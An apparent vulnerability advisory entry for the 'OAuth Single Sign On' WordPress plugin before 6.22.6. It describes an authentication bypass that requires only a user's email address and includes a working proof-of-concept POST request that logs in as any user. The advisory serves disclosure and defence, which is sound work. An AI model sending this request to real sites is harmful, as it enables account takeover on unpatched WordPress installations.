WordPress Plugin Vulnerabilities

OAuth Single Sign On < 6.22.6 - Authentication Bypass

Description

The plugin doesn't validate that OAuth access token requests are legitimate, which allows attackers to log onto the site with the only knowledge of a user's email address.

Proof of Concept

POST / HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 40
Connection: close

option=mooauth&email=admin@localhost.org

Affects Plugins

References

Classification

Miscellaneous

Original Researcher
Lana Codes
Submitter
Lana Codes
Submitter website
Submitter twitter
Verified
Yes

Timeline

Publicly Published
2022-06-27 (about 1 years ago)
Added
2022-06-27 (about 1 years ago)
Last Updated
2023-04-01 (about 1 years ago)

Other